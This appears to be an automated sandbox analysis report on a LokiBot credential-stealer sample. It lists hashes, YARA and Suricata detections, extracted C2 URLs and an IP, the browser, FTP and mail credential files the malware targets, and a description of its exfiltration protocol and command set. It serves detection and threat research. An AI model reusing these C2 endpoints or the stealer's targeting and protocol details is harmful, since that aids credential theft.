Edit tour

Windows Analysis Report
0yWVteGq5T.exe

Overview

General Information

Sample name:	0yWVteGq5T.exe renamed because original name is a hash value
Original sample name:	c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c.exe
Analysis ID:	1571285
MD5:	d7ede461fd6438cfae2cba59fa1e07e9
SHA1:	b6f2dbb0d2ae969583a96b8463ccc561324c7b27
SHA256:	c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c
Tags:	exeuser-adrian__luca
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

0yWVteGq5T.exe (PID: 3416 cmdline: "C:\Users\user\Desktop\0yWVteGq5T.exe" MD5: D7EDE461FD6438CFAE2CBA59FA1E07E9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
0yWVteGq5T.exe	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0yWVteGq5T.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0yWVteGq5T.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0yWVteGq5T.exe	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0yWVteGq5T.exe	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0yWVteGq5T.exe	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0yWVteGq5T.exe	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0yWVteGq5T.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 3 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: 0yWVteGq5T.exe PID: 3416	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: 0yWVteGq5T.exe PID: 3416	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 0yWVteGq5T.exe PID: 3416	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: 0yWVteGq5T.exe PID: 3416	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x8843:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xca63:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.0yWVteGq5T.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.0.0yWVteGq5T.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.0yWVteGq5T.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.0yWVteGq5T.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.0yWVteGq5T.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.0yWVteGq5T.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.0yWVteGq5T.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.0.0yWVteGq5T.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.0yWVteGq5T.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.0yWVteGq5T.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.0.0yWVteGq5T.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.0yWVteGq5T.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.0yWVteGq5T.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.0yWVteGq5T.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.0.0yWVteGq5T.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.0.0yWVteGq5T.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 11 entries

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:51:40.997887+0100	2024312	1	A Network Trojan was detected	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:43.112123+0100	2024312	1	A Network Trojan was detected	192.168.2.6	49708	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:51:39.566096+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:41.388226+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49708	94.156.177.41	80	TCP
2024-12-09T08:51:43.494161+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:45.316994+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:46.997946+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:48.825174+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:50.500278+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:52.709648+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:54.371881+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:56.186859+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:00.874032+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:02.924152+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:07.593802+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:09.406949+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:11.232353+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:13.423061+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:15.682605+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:17.325150+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:22.154447+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:23.972500+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:25.653268+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:27.621178+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:29.310465+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:31.142639+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:32.844275+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:34.672995+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:36.479932+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:38.214537+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:39.872509+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:41.529353+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:43.346921+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:45.154565+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:46.983185+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:48.658727+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:51.358825+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:53.027579+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:55.108776+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:56.790419+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:52:58.611498+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:00.419701+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:02.244480+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:04.064839+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:05.731669+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:07.405384+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:09.232229+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:10.889178+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:12.702697+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:14.518189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:16.345760+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:18.018612+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:19.857048+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:21.514620+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:23.627769+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:25.479289+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:27.294180+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:32.251367+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:34.465271+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:39.296364+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50032	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:51:45.047544+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49710	TCP
2024-12-09T08:51:46.735993+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49712	TCP
2024-12-09T08:51:48.558599+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49713	TCP
2024-12-09T08:51:50.229157+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49715	TCP
2024-12-09T08:51:52.441798+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49721	TCP
2024-12-09T08:51:54.105409+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49726	TCP
2024-12-09T08:51:55.923388+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49732	TCP
2024-12-09T08:52:00.604257+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49736	TCP
2024-12-09T08:52:02.430253+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49755	TCP
2024-12-09T08:52:07.334848+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49757	TCP
2024-12-09T08:52:09.148041+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49773	TCP
2024-12-09T08:52:10.967759+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49775	TCP
2024-12-09T08:52:13.150006+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49781	TCP
2024-12-09T08:52:15.380232+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49787	TCP
2024-12-09T08:52:17.055207+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49793	TCP
2024-12-09T08:52:21.883707+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49799	TCP
2024-12-09T08:52:23.706862+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49811	TCP
2024-12-09T08:52:25.383816+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49818	TCP
2024-12-09T08:52:27.211831+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49823	TCP
2024-12-09T08:52:29.025072+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49828	TCP
2024-12-09T08:52:30.869216+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49833	TCP
2024-12-09T08:52:32.583829+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49836	TCP
2024-12-09T08:52:34.403160+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49841	TCP
2024-12-09T08:52:36.222043+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49848	TCP
2024-12-09T08:52:37.937696+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49854	TCP
2024-12-09T08:52:39.617090+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49859	TCP
2024-12-09T08:52:41.271992+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49863	TCP
2024-12-09T08:52:43.084245+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49867	TCP
2024-12-09T08:52:44.895864+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49873	TCP
2024-12-09T08:52:46.712064+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49879	TCP
2024-12-09T08:52:48.387942+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49885	TCP
2024-12-09T08:52:51.098178+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49888	TCP
2024-12-09T08:52:52.770279+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49896	TCP
2024-12-09T08:52:54.851047+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49900	TCP
2024-12-09T08:52:56.515239+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49906	TCP
2024-12-09T08:52:58.343275+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49911	TCP
2024-12-09T08:53:00.162703+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49917	TCP
2024-12-09T08:53:01.975965+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49924	TCP
2024-12-09T08:53:03.799477+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49929	TCP
2024-12-09T08:53:05.461784+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49935	TCP
2024-12-09T08:53:07.133139+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49937	TCP
2024-12-09T08:53:08.967742+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49943	TCP
2024-12-09T08:53:10.632378+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49949	TCP
2024-12-09T08:53:12.442925+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49954	TCP
2024-12-09T08:53:14.257210+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49960	TCP
2024-12-09T08:53:16.072199+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49962	TCP
2024-12-09T08:53:17.742970+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49968	TCP
2024-12-09T08:53:19.572995+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49973	TCP
2024-12-09T08:53:21.253640+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49978	TCP
2024-12-09T08:53:23.356465+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49984	TCP
2024-12-09T08:53:25.215864+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49990	TCP
2024-12-09T08:53:27.037389+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	49994	TCP
2024-12-09T08:53:31.852429+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	50000	TCP
2024-12-09T08:53:34.199827+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	50014	TCP
2024-12-09T08:53:39.024901+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.6	50020	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

